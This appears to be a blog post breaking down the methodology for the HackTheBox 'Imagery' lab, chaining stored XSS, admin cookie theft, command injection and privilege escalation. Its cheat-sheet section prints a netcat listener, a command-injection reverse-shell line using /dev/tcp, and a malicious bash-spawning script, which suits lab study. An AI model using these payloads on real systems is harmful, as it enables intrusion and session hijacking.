I see it all the time in pentest reports: Stored XSS gets rated as Medium or even Low because it requires user interaction. But my recent run through HackTheBox’s Imagery machine reminded me why that mindset is dangerous.
The box is a perfect example of a Daisy Chain attack where a seemingly minor client-side bug becomes the skeleton key for the entire backend.
Note:
This post is not a step-by-step walkthrough, exploit guide, or solution. It is intentionally written as a learning-first methodology breakdown.
The value of this approach is simple: walkthroughs teach what to type; methodologies teach how to think. By focusing on enumeration strategy, decision-making patterns, and architectural reasoning, this post is designed to help you transfer the same mindset to real assessments, labs, certifications, and production environments not just this specific challenge.
Use this content to:
- Sharpen your mental model, not your copy-paste skills
- Understand why certain paths exist rather than memorizing how to reach them
- Build repeatable intuition that applies beyond CTFs
If your goal is long-term growth as a security practitioner, this style will compound. If your goal is only to solve the box, this post is deliberately not optimized for that.
Here is the TL;DR of the kill chain:
The Enumeration Methodology
The standard approach of blindly firing directory busters will yield limited returns here. The elite methodology requires a Feature-First audit.
Upon discovering the web service on port 8000 (running Werkzeug/Python), your primary goal isn’t just to map endpoints, but to map data flows. You must identify every input field, login forms, upload buttons, and critically, the “Bug Report” feature.
The presence of a bug report system should trigger immediate investigation into Stored Cross-Site Scripting (XSS) vectors.
You are asking: If I submit this, who reads it? If the answer is “an admin, you have a potential path to privilege hijacking.
Simultaneously, the Image Transformation features (crop, rotate, etc.) must be flagged as high-probability targets for Command Injection, as these often rely on underlying system shell commands rather than safe API calls.
HackTheBox Certified Web Exploitation Specialist (HTB CWES) Notes (Unofficial) - Buymeacoffee
Welcome to the HTB Certified Web Exploitation Specialist (HTB CWES) Guide. Whether you’re just starting your journey in ethical hacking or looking to refine your existing skills, this resource is stru
buymeacoffee.com
Stored XSS
It started with a standard “Bug Report” feature. Most would check for SQLi and move on. I found I could inject a payload that stored XSS.
Cookie Theft
It wasn’t about popping an alert box. I used the XSS to blindly exfiltrate the Administrator’s session cookie when they (the bot/admin) reviewed the report.
The RCE
With admin access, I reached the image management panel. Code review (leaked via a directory traversal bug) revealed a Command Injection flaw in the crop feature—but it was only accessible to authenticated admins. Without that "low prio" XSS, the RCE was unreachable.
The PrivEsc
Leaked the database credentials to crack the test user's hash.
Found an encrypted backup (pyAesCrypt), brute-forced it to find another user's hash.
Finally rooted the box by abusing a custom backup utility running with sudo privileges.
Commands Cheat Sheet
While the logic is paramount, having the right syntax is critical for execution.
XSS Payload (Session Stealing): Inject this into the bug report description to exfiltrate the admin’s cookie to your listener.
Cookie Listener:
nc -lvnp 4444
Command Injection (ImageMagick Context): If the application naively concatenates arguments, you can break out of the convert command. ; /bin/bash -c 'bash -i >& /dev/tcp//4445 0>&1';
Stabilizing the Shell:
python3 -c 'import pty; pty.spawn("/bin/bash")' (Ctrl+Z) stty raw -echo; fg
Privilege Escalation (Cron/File Monitoring): If a root script processes files in a directory you control, creating a malicious file name or content can trigger execution.
echo 'import os; os.system("/bin/bash")' > /tmp/malicious.py
The Takeaway
If you are ignoring XSS to hunt for “cooler” binary exploits, you are missing the forest for the trees. In modern web apps, XSS is often the only way to bridge the gap between “Public User” and “Internal Admin” where the RCEs actually live.
If you want to see the exact payloads, the Python scripts I used for the crypto-cracking, and the full step-by-step breakdown, check out my writeup here
Join the Cyber Security Notes Membership:
Get exclusive cybersecurity notes, weekly expert insights, and practical breakdowns you won’t find in public feeds. Built for people who want clarity, not content overload.
Membership | The MasterMinds Notes - Buymeacoffee
AboutCyber Security Notes & CoursesContactconsultation@motasem-notes.netProduct's Legal & TOS InfoPlease read all terms of service and legal information about the products from hereReviews and
buymeacoffee.com
Top comments (0)